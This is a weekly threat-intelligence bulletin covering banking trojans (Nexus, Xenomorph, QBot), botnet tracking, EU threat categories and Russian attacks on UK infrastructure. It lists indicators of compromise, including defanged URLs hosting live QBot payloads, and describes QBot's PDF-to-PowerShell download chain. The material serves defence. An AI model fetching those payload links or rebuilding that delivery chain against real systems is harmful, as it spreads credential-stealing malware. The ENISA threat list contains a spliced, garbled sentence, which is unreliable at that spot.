Intel Reports

Activity Summary - Week Ending on 20 April 2023:

• Red Sky Alliance identified 29,549 connections from new IP’s checking in with our Sinkholes
• Descapital[.]com in the US hit 397x
• 22 ‘new’ Botnets hits
• Dark Web Forum Instruction
• Nexus & Xenomorph Android Banking Trojans   
• EU Main and Emerging Threats
• UK & RU
• Qbot in Italy

Red Sky Alliance Compromised (C2) IP’s  

On 19 April 2023, Red Sky Alliance identified 29,549 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.

Red Sky Alliance Malware Activity   

For a full black list – contact analysts: info@redskyalliance.com

Red Sky Alliance Botnet Tracker

On 19 April 2023, analysts identified 22 new IP addresses participating in various botnets (call for full .csv Blacklists, below are only a small sampling of botnet trackers).  We are currently upgrading this collection.

Red Sky Alliance Dark Web Data  / Last 6 Months

Darkweb Data - Darkweb data is collected from a variety of pages on the Tor network and their plain web mirrored counterparts or plain-web forums with intent overlap.  This includes forums, ransomware listings, and marketplaces. Data found in this is broad as it will contain companies already breached, various login credentials (personal and business), and variety of software, identification papers, and counterfeit items for sale.

Below is an example of several forum sites.  These are instructions on how to handle stolen credit card numbers.  Stolen credit cards (BINs) are being sold on a daily basis in the Dark Web.  Well, once you purchase the data, you need instructions on how to use the stolen information.

MALICIOUS CYBER TRENDS:

Nexus & Xenomorph Android Banking Trojans: CFTR-2023-04-0003 - Banking Trojans are malicious software that steal sensitive financial information from users’ computers, smartphones, or tablets.  They pose a serious threat to individuals, businesses, and financial institutions. In this report, the Cyber-Fraud .  Threat Intelligence Unit (CFTIU) will focus on two Android Banking Trojans, Nexus and Xenomorph.  The report will examine their characteristics, capabilities, and indicators of compromise.[1]

Nexus1 - In early 2023, criminal actors updated Nexus, a sophisticated Android banking Trojan.  Attackers distribute the malware through phishing emails, malicious websites, and fake apps. Upon installation on a victim’s device, Nexus disguises itself as a legitimate app and conceals its presence.  The Trojan then waits for the user to open a banking app or access a financial website.  When the user enters login credentials, Nexus intercepts and steals the information.

Capabilities:

Keylogging: Nexus captures every keystroke made by the victim, including passwords and other sensitive information.  Screenshot capture: Nexus takes screenshots of the victim’s device, allowing the attacker to see everything happening on the screen.  Overlay attacks: Nexus creates a fake login screen that overlays the legitimate app.  When the victim enters credentials, the attacker receives the information.

Indicators of Compromise (IOCs) - Indicator type Indicator:

• IPv4 193.42.32.84
• IPv4 193.42.32.87
• FileHash-MD5 d4c6871dbd078685cb138a499113d280
• FileHash-SHA1 60b64c8481f9de5b92634efc70a9ff42f451c78f
• FileHash-SHA256 376d13affcbfc5d5358d39aba16b814f711f2e81632059a4bce5af060e038ea4
• 1
• “Nexus: a new Android botnet?” Cleafy Threat Intelligence, 21 March 2023, https://www.cleafy.com/cleafy-labs/nexus-a-newandroid-botnet
• Cyber-Fraud Threat Report 2023-04-0003
• Xenomorph2 - Xenomorph is a relatively new Android banking Trojan that surfaced in 2021. Attackers distribute it through malicious apps usually downloaded from third-party app stores. Once installed on a victim’s device, Xenomorph requests extensive permissions, including the ability to read and send SMS messages and make phone calls.  This enables the Trojan to intercept multi-factor authentication (MFA) codes and make unauthorized transactions.

Capabilities:

• Intercepting SMS messages: Xenomorph intercepts SMS messages containing one-time passwords (OTPs) and other sensitive information. Overlay attacks: Xenomorph creates a fake login screen that overlays the legitimate app.  When the victim enters credentials, the attacker receives the information.  RAT functionality: Xenomorph has Remote Access Trojan (RAT) functionality, enabling the attacker to remotely control the victim’s device.
• Automated Transfer System (ATS) framework enabling the malware to perform automated:
  • Extraction of account credentials
  • Harvesting of 2FA/MFA text messages and tokens from authenticator applications
  • Account balance inquires
  • Fund transfers

Indicators of Compromise (IOCs) - Indicator type Indicator:

• FileHash-MD5 8ce057ff57478e98c0e246355ccd27db
• FileHash-MD5 a8576c7eef420ba9af6f76bdb18671c6
• FileHash-MD5 ef5d5926365ae0448abd541965261b9f
• FileHash-SHA1 1d3cc636883c72d45e8f336344bdea97ec8d91d1
• FileHash-SHA1 8108e253e30df9934fd9f2aa15a8282484dbad9f
• FileHash-SHA1 a88b8319e89c1246793ec1d41f5a7ed7343d31f7
• FileHash-SHA256 15e3c87290957590dbaf4522645e92933b8f0187007468045a5bd102c47ea0f4
• FileHash-SHA256 88d3cb485f405a6cec9d14e9ee2865491855897bfc9a958c0e7c06485a074d02
• FileHash-SHA256 9ce2ad40f3998860ca1ab21d97ea7346bf9d26ff867fc69c4d005c477c67a899 domain cofi.hk

Indicator type Indicator:

• domain dedeperesere.xyz
• domain jobviewer.co
• domain vldeolan.com
• hostname inj.had0.live
• hostname team.mi1kyway.tech

Additional Information for Investigators:

Nexus and Xenomorph are both sophisticated Malware-as-a-Service (MaaS) and capable of stealing sensitive financial information from victims. It is crucial that users take precautions to protect their devices from these threats. Users should only download apps from trusted sources, keep their devices up to date with the latest security patches, and use MFA whenever possible. By taking these steps, users can help protect themselves from becoming victims of banking.

Trojans - If there are additional questions or concerns related to Nexus, Xenomorph, or other banking trojans, please contact the CFTIU at USSS.CFTIU@usss.dhs.gov

GLOBAL TRENDS:   

EU Main and Emerging Threats -

1. Ransomware: hackers seize control of someone’s data and demand a ransom to restore access - In 2022, ransomware attacks continued to be one of the main cyberthreats.  They are also getting more complex. According to a survey quoted by Enisa that was conducted at the end of 2021 and in 2022, over half of respondents or their employees had been approached in ransomware attacks.  Data quoted by the EU Agency for Cybersecurity shows that the highest ransomware demand grew from €13 million in 2019 to €62 million in 2021 and the average ransom paid doubled from €71,000 in 2019 to €150,000 in 2020. It is estimated that in 2021 global ransomware reached €18 billion worth of damages – 57 times more than in 2015.[2]

2. Malware: software that harms a system - Malware includes viruses, worms, Trojan horses and spyware. After a global decrease in malware linked to the Covid-19 pandemic in 2020 and early 2021, its use increased heavily by the end of 2021, as people started returning to the office. The rise of malware is also attributed to crypto-jacking (the secret use of a victim’s computer to create cryptocurrency illegally) and Internet-of-Things malware (malware targeting devices connected to the internet such as routers or cameras).  According to Enisa, there were more Internet-of-Things attacks in the first six months of 2022 than in the previous four years.
3. Social engineering threats: exploiting human error to gain access to information or services - Tricking victims into opening malicious documents, files or emails, visiting websites and thus granting unauthorized access to systems or services. The most common attack of this sort is phishing (through email) or smishing (through text messages).  Almost 60% of the breaches in Europe, the Middle East and Africa include a social engineering component, according to research quoted by Enisa.   The top organizations impersonated by phishers were from the financial and technology sectors.  Criminals are al4.  Threats against data: targeting sources of data to get unauthorized access and disclosure.   We live in a data-driven economy, producing huge amounts of data that are extremely important for, among others, enterprises and Artificial Intelligence, which makes it a major target for cybercriminals.  Threats against data can be mainly classified as data breaches (intentional attacks by a cybercriminal) and data leaks (unintentional releases of data).  Money remains the most common motivation of such attacks.  Only in 10% of cases is espionage the motive.so increasingly targeting crypto exchanges and cryptocurrency owners.
4. Threats against availability - Denial of Service: attacks preventing users from accessing data or services - These are some of the most critical threats to IT systems. They are increasing in scope and complexity. One common form of attack is to overload the network infrastructure and make a system unavailable.  Denial of Service attacks are increasingly hitting mobile networks and connected devices.  They are used a lot in Russia-Ukraine cyberwarfare. Covid-19 related websites, such as those for vaccination have also been targeted.
5. Threats against availability: threats to the availability of the internet - These include physical take-over and destruction of internet infrastructure, as seen in occupied Ukrainian territories since the invasion, as well as the active censoring of news or social media websites.
6. Disinformation/misinformation: the spread of misleading information - The increasing use of social media platforms and online media has led to a rise in campaigns spreading disinformation (purposefully falsified information) and misinformation (sharing wrong data). The aim is to cause fear and uncertainty. Russia has used this technology to target perceptions of the war.  Deepfake technology means it is now possible to generate fake audio, video or images that are almost indistinguishable from real ones. Bots pretending to be real people can disrupt online communities by flooding them with fake comments.
7. Supply-chain attacks: targeting the relationship between organizations and suppliers - This is a combination of two attacks - on the supplier and on the customer. Organizations are becoming more vulnerable to such attacks, because of increasingly complex systems and a multitude of suppliers, which are harder to oversee.

UK & RU - Russian hackers are now focusing their efforts to ‘disrupt or destroy’ British power networks say government officials.  On 19 April UK Cabinet Minister Oliver Dowden will brief a cyber conference on a ‘new class’ of Russian cyber-criminal, bent on crippling Britain’s infrastructure.  Following the effectiveness of cyber-attacks in Ukraine in which the national power grid was taken down, and nuclear power plants and satellite communications were disrupted, pro-Putin groups are now targeting the UK.[3]

At the CyberUK Conference in Belfast, Mr. Dowden will outline how companies that are responsible for ‘keeping the lights on,’ will be subject to unrestrained cyber-attacks.  An official statement is expected today from the UK’s National Cyber Security Centre (NCSC), warning vital national infrastructure operators that they face an unpredictable ‘new class of Russian cyber adversary’ whose mission is to cause chaos for the British people.  The conference will also discuss how the Wagner group and other Kremlin allies are mounting what could be devastating attacks to ‘disrupt or destroy’ key industries such as energy and utilities, essential to keep the country running.

Bridewell, a cyber security specialist company reported a 50% rise in ransomware threats against UK infrastructure in 2022.  Since Russia’s invasion of Ukraine, IT security staff across various sectors including government and communications, transport, aviation, utilities, and finance revealed that seven in ten had seen a rise in cyber attacks.

The official threat notice from the NCSC indicates, “Over the past 18 months, a new class of Russian cyber adversary has emerged. These state-aligned groups are often sympathetic to Russia’s invasion and are ideologically, rather than financially, motivated.  Although these groups can align to Russia’s perceived interests, they are often not subject to formal state control, and so their actions are less constrained and their targeting broader than traditional cybercrime actors. This makes them less predictable. We expect these groups to look for opportunities to create an impact, particularly if systems are poorly protected.”  The UK’s Royal Mail was hit by a cyber-attack in January 2023,  which was linked to Russia.

QBot in Italy - In early April 2023, Kaspersky detected a significant increase in attacks that use banking Trojans of the QBot family (aka QakBot, QuackBot, and Pinkslipbot).  The malware would be delivered through e-mail letters written in different languages, variations of them were coming in English, German, Italian, and French.  The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.  As a rule, such letters would be urging the addressee, under a plausible pretext, to open an enclosed PDF file.  As an example, they could be asking to provide all the documentation pertaining to the attached application or to calculate the contract value based on the attached cost estimate.[4]

Example of a forwarded letter containing a malicious attachment

Such simulated business correspondence can obstruct spam tracking while increasing the probability of the victim falling for the trick.  For authenticity, the attackers put the sender’s name from the previous letters in the ‘From’ field; however, the sender’s fraudulent e-mail address will be different from that of the real correspondent.

A short look at QBot - The banking Trojan QBot was detected for the first time in 2007.  Since then, it has gone through multiple modifications and improvements to become one of the most actively spread malware in 2020.  In 2021, we published a detailed QBot technical analysis.   Currently the banker keeps getting new functions and module updates for increased effectiveness and profit.   QBot distribution methods have also evolved. Early on it was distributed through infected websites and pirated software.  Now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings.

New QBot infection chain

The QBot malware delivery scheme begins with an e-mail letter with a PDF file in the attachment being sent.  The document’s content imitates a Microsoft Office 365 or Microsoft Azure alert advising the user to click Open to view the attached files.  If the user complies, an archive will be downloaded from a remote server (compromised site), protected with a password given in the original PDF file.

Examples of PDF attachments

In the downloaded archive there is a .wsf (Windows Script File) file containing an obfuscated script written in JScript.

Obfuscated JScript

After the WSF file is deobfuscated its true payload gets revealed: a PowerShell script encoded into a Base64 line.

Encoded PowerShell script

So, as soon as the user opens the WSF file from the archive, the PowerShell script will be discretely run on the computer and use wget to download a DLL file from a remote server.  The library’s name is an automatically generated alphabetic sequence varying from one victim to another.

Decoded PowerShell script

The PowerShell script will try in succession to download the file from each one of the URLs listed in the code.  To figure whether the download attempt was successful, the script will check the file size using the Get-Item command to get the information.  If the file size is 100,000 bytes or more, the script will run the DLL with the help of rundll32.  Otherwise, it will wait for four seconds before attempting to download the library using the next link down the list.  The downloaded library is the Trojan known as QBot (detected as Trojan-Banker.Win32.Qbot.aiex).

Technical description of malicious DLL

Analyzed was the Qbot samples from the current e-mail campaign.  The bot’s configuration block features company name “obama249” and time stamp “1680763529” (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will be using to connect to command servers.  Most of these addresses belong to those users, whose infected systems provide an entry point into the chain which is used to redirect the botnet traffic to real command servers.

Qbot’s functionality hardly changed in the past couple of years.  As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system.  Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware.  Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.

Statistics – Kaspersky analyzed the QBot attack statistics collected using Kaspersky Security Network (KSN).  According to our data, the first letters with malicious PDF attachments began to arrive in the evening of 4 April 2023.  The mass e-mail campaign began at 12:00 p.m. on the following day and continued until 9:00 p.m. During that time we detected an approximate total of 1,000 letters.  The second upsurge began on April 6, again at noon, with over 1,500 letters dispatched to our customers this time.  For the next few days new messages kept coming, and soon, on the evening of 12 April researchers discovered another upsurge with 2,000 more letters sent to our customers.  After that cybercriminal activity went down, but users still receive fraudulent messages.

Geography of Qbot family attacks, April 1–11, 2023 

In addition, we checked which countries were targeted by Qbot the most by relating the number of users attacked in a given country against the total number of users attacked worldwide.  It turned out, the bank Trojan QBot was a more common issue for the residents of Germany (28.01%), Argentina (9.78%), and Italy (9.58%).

Qbot indicators of compromise (IOCs):

MD5 / PDF files:
253E43124F66F4FAF23F9671BBBA3D98
39FD8E69EB4CA6DA43B3BE015C2D8B7D

ZIP archives:
299FC65A2EECF5B9EF06F167575CC9E2
A6120562EB673552A61F7EEB577C05F8

WSF files:
1FBFE5C1CD26C536FC87C46B46DB754D
FD57B3C5D73A4ECD03DF67BA2E48F661

DLL:
28C25753F1ECD5C47D316394C7FCEDE2

Malicious links - ZIP archive:
cica.com[.]co/stai/stai.php
abhishekmeena[.]in/ducs/ducs.php

DLL:
rosewoodlaminates[.]com/hea/yWY9SJ4VOH
agtendelperu[.]com/FPu0Fa/EpN5Xvh
capitalperurrhh[.]com/vQ1iQg/u6oL8xlJ
centerkick[.]com/IC5EQ8/2v6u6vKQwk8
chimpcity[.]com/h7e/p5FuepRZjx
graficalevi.com[.]br/0p6P/R94icuyQ
kmphi[.]com/FWovmB/8oZ0BOV5HqEX
propertynear.co[.]uk/QyYWyp/XRgRWEdFv
theshirtsummit[.]com/MwBGSm/lGP5mGh

[1] USSS Cyber-Fraud Threat Report 2023-04-0003

[2] https://www.eureporter.co/defence/cybercrime-2/2023/04/13/cybersecurity-main-and-emerging-threats-2/

[3] https://euroweeklynews.com/2023/04/19/massive-threat-to-britain-from-new-breed-of-russian-hackers/

[4] https://securelist.com/qbot-banker-business-correspondence/109535/